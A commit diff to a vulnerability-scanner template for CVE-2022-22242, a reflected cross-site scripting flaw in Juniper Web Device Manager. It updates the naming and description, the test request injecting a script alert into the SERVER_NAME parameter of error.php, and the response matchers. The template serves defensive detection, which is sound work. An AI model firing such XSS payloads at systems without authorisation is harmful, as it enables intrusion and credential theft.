Update CVE-2022-22242.yaml
parent
b76f5c9a65
commit
5b4c8b80fc
|
@ -1,34 +1,37 @@
|
||||||
id: junos-web-xss
|
id: juniper-web-xss
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: JunOS Web - Cross-Site Scripting
|
name: Juniper Web Device Manager - Cross-Site Scripting
|
||||||
author: EvergreenCartoons
|
author: EvergreenCartoons
|
||||||
severity: high
|
severity: high
|
||||||
description: JunOS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
|
description: Juniper Web Device Manager contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
|
||||||
reference:
|
reference:
|
||||||
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 7.2
|
cvss-score: 7.2
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
tags: xss,juniper,junos
|
tags: xss,juniper
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(/xss/)</script>'
|
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- "<script>alert(/xss/)</script>"
|
|
||||||
part: body
|
part: body
|
||||||
|
words:
|
||||||
|
- "<script>alert(document.domain)</script>"
|
||||||
|
- "The requested resource is not authorized to view"
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "text/html"
|
- "text/html"
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
Loading…
Reference in New Issue